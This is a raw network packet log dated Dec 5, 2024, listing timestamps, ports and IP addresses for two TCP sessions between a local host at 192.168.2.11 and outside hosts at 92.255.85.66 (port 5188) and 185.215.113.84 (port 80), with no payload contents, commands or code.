Dec 5, 2024 17:32:15.208169937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.208220959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.208354950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.209353924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.209419012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.209815979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.210510015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.210589886 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.210798025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.211680889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.211729050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.211987019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.212846041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.212896109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.213629007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.214020967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.214070082 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.214247942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.215195894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.215261936 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.215322018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.216233015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.216299057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.216494083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.217269897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.217361927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.218144894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.218473911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.218487024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.218538046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.219531059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.219628096 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.220155001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.220948935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.221004963 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.221815109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.222168922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.222181082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.222259998 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.222975969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.223031998 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.223464966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.224122047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.224200010 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.224442005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.225243092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.225312948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.225507975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.226358891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.226424932 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.226707935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.227540016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.227602959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.227721930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.228717089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.228760958 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.229368925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.229813099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.229859114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.229979038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.230921984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.230966091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.231525898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.232105970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.232151985 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.232208014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.233232021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.233274937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.233355045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.234292984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.234407902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.235049009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.235605001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.235654116 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.235743999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.236726999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.236788988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.236963987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.237801075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.237845898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.237848043 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.238879919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.238924026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.239151955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.240000010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.240045071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.240087986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.241148949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.241374969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.241379023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.242336035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.242378950 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.242465019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.243534088 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.243588924 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.243940115 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.244811058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.244860888 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.244911909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.245897055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.245934010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.245949984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.246874094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.246922016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.246922970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.247992992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.248085976 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.248091936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.249094009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.249171972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.249334097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.250297070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.250348091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.250447035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.251475096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.251534939 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.251600981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.252567053 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.252723932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.252785921 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.253650904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.253751993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.253772974 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.299335003 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.305001020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.305067062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.305098057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.305136919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.305526972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.305573940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.305650949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.305692911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.306714058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.306761026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.306900978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.306940079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.307843924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.308137894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.308201075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.309082031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.309142113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.310333014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.310348034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.310360909 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.310415983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.311296940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.311353922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.312442064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.312488079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.312525988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.312539101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.312576056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.313755035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.313811064 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.314038038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.314080954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.314764023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.314840078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.314913034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.315928936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.316306114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.316361904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.317060947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.317120075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.317590952 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.317645073 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.318206072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.318627119 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.318674088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.319369078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.319427967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.319489002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.319530964 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.320535898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.320581913 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.320604086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.320641041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.321686029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.321734905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.321769953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.322000027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.322844028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.322885990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.322937965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.323030949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.324017048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.324872017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.324945927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.325129986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.325149059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.325174093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.325196981 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.326288939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.326699972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.326751947 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.327410936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.327461004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.327481985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.327517033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.328591108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.328638077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.328764915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.328809977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.329863071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.329907894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.330162048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.330209017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.330976009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.331274033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.331336975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.332101107 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.332175970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.332324028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.332369089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.333266973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.333420038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.333462954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.334428072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.334527969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.334583998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.335967064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.336028099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.336070061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.336102962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.336770058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.336783886 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.336817980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.337835073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.337843895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.337893963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.337924004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.337960005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.339445114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.339492083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.339600086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.339659929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.340466022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.340555906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.340578079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.340598106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.341420889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.341463089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.341478109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.341506958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.342458010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.342684031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.342736959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.343609095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.343647003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.343672991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.343688011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.344749928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.344805002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.344984055 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.345021009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.345905066 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.345963955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.346262932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.346297026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.347075939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.347167015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.347187996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.347213030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.348238945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.348623037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.348676920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.349431992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.349477053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.349523067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.349559069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.350646973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.350694895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.350857973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.350899935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.351756096 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.351809025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.351855993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.352910042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.352972984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.353038073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.353075981 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.353991985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.354079008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.354132891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.355155945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.355211020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.355218887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.355254889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.356317997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.356353998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.356728077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.357496023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.357517004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.357542038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.357558966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.358597994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.358643055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.358670950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.358779907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.359925032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.360233068 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.360259056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.360299110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.361710072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.361830950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.361848116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.361907959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.362781048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.362838030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.363039017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.363082886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.363840103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.363887072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.363914967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.363949060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.364845037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.364890099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.364896059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.364923000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.365696907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.365746975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.391987085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.392373085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.392446041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.393055916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.393068075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.393345118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.393383026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.393882990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.393893957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.393937111 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.395014048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.395088911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.395277977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.396219015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.396266937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.396852970 CET	5188	49792	92.255.85.66	192.168.2.11
